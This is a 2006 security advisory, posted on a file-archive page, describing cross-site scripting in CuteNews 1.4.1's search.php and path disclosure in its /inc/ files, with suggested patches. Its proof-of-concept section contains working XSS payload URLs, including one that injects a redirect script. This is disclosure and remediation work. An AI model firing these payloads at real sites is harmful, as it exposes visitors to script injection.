what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

neo-Advisory-20.txt

neo-Advisory-20.txt
Posted May 6, 2006
Authored by K4P0 | Site NeoSecurityTeam.net

CuteNews version 1.4.1 suffers from cross site scripting and path disclosure vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 2d3284ee43c5c18d1076a379f080ef8ec6f19ddd8dca6c281a69e3e7a8165290

neo-Advisory-20.txt

Change Mirror Download
/*
---------------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® Advisory #20
---------------------------------------------------------------
Program : CuteNews 1.4.1
Homepage: https://www.cutephp.com
Vulnerable Versions: CuteNews 1.4.1 & lower ones
Risk: Medium!
Impact: Cross Site Scripting, Full Path Disclosure

-> CuteNews 1.4.1 Multiple vulnerabilities <-
---------------------------------------------------------------

- Description
---------------------------------------------------------------
Cute news is a powerful and easy for using news management system
that use flat files to store its database. It supports comments and
archives that can be organized by months.

- Tested
---------------------------------------------------------------
Tested in localhost & many remote CuteNews

- Bug
---------------------------------------------------------------
1 - [ Cross Site Scripting ]
There're serveral XSS bugs in 'search.php' file, this is caused because
the script doesn't filter right three _GET variables that're used in
some fields of the web page.

To be short, here is the vulnerable code:

<div align="center">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><table width="100%" cellspacing="0" cellpadding="0">
<td width="100%">
<p align="right">News <input type=text value="$story"
name=story size="24">
</table></td>
</tr>
<tr>
<td>

<div id='advanced' style='display:none;z-index:1;'>
<table width="100%" cellspacing="0" cellpadding="0">
<td width="100%" align="right">
<p align="right">Title&nbsp;<input type=text value="$title"
name=title size="24">
<tr>
<td width="100%" align="right">Author&nbsp;<input type=text value="$user"
name=user size="24">
</tr>

Those variables where `extracted' (extract()) from the global variables,
but the problem itself is that they're not filtered. So here we can see
that the following variables allow html injection arbitrary code: $user,
$story, $title.

2 - [ Full Path Disclosure ]
In /inc/ folder, there're 2 .php files that don't check if they're been
called directly.

- Proof of concept
---------------------------------------------------------------
1 - [ Cross site scripting ]
As PoC, here you've some intresting results:

- search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert
%28%22NST+PoC+by+K4P0%22%29%3B%3C%2Fscript%3E&title=&
user=&from_date_day=&from_date_month=&from_date_year=&
to_date_day=&to_date_month=&to_date_year=

- search.php?dosearch=yes&title=%22%3E%3Cscript%3Ealert
(%22NST%20PoC%20by%20K4P0%22 );%3C/script%3E&user=
&from_date_day=&from_date_month=&from_date_year=
&to_date_day =&to_date_month=&to_date_year=

- search.php?dosearch=yes&story=K4P0&user=%22%3E%3Cscript%3
Ealert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&from_date_day=
&from_date_month=&from_date_year=&to_date_day=&to_date_month=
&to_date_year=

- search.php?dosearch=yes&title="><script>window.location=
'https://www.neosecurityteam.net/';</script>&user=&from_date_day=
&from_date_month=&from_date_year=&to_date_day=&to_date_month=
&to_date_year=

Note: magic_quotes_gpc must be off

2 - [ Full path disclosure ]
www.victim.com/cutenews/inc/show.inc.php
www.victim.com/cutenews/inc/functions.inc.php

- Solutions
---------------------------------------------------------------
It's highly recommended to uptdate your CuteNews, but if you want to
patch it yourself take a look at the following recommendations:

1 - [ Cross site scripting ]
Set magic_quotes_gpc ON in your php.ini, but as this cannot be possible
in serveral servers (hosting stuff), the real solution is to filter
these variables.

Go to line 25 and change it to this:

// Show Search Form
$user = htmlentities($user);
$story = htmlentities($story);
$title = htmlentities($title);
echo<<<HTML
<script language='javascript' type="text/javascript">
function mySelect(form){
form.select();
}
function ShowOrHide(d1, d2) {
if (d1 != '') DoDiv(d1);
if (d2 != '') DoDiv(d2);
}

2 - [ Full Path Disclosure ]
In the first line of 'functions.inc.php' write:
if (eregi('functions.inc.php', $_SERVER['PHP_SELF']))
die('You are not allowed to see this page directly');

In the first line of 'shows.inc.php' write:
if (eregi('shows.inc.php', $_SERVER['PHP_SELF']))
die('You are not allowed to see this page directly');

- Timeline
---------------------------------------------------------------
03/03/2006 - Vendor was notified about security issues
*** - Vendor did not reply but released a newer version.

- Discalimer
---------------------------------------------------------------
YOU are the only RESPONSALBE of any DAMAGE of above techniques
could cause or any code you have made based in this advisory,
all ideas, proof of concepts, solutions, descriptions were made
only for EDUCATIONAL propuses, use all above information at your
own risk.

- References
---------------------------------------------------------------
https://NeoSecurityTeam.net/index.php?action=advisories&id=20
https://NeoSecurityTeam.net/advisories/Advisory-20.txt

- Credits
---------------------------------------------------------------
Discovered by k4p0 -> k4p0k4p0[at]hotmail[dot]com

[N]eo [S]ecurity [T]eam [NST]® - https://NeoSecurityTeam.net/

Irc.FullNnetwork.org #nst
Questions? (Eng | Spa) -> https://NeoSecurityTeam.net/foro/

- Greets
---------------------------------------------------------------
Paisterist
HaCkZaTaN
Link
Daemon21
erg0t
NST Comunity!


@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@''''
'@@'''@@@@'''''''''@@@''''@@@''''
@@@@''''@@'@@@@@@@@@@''''@@@@@'''
*/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close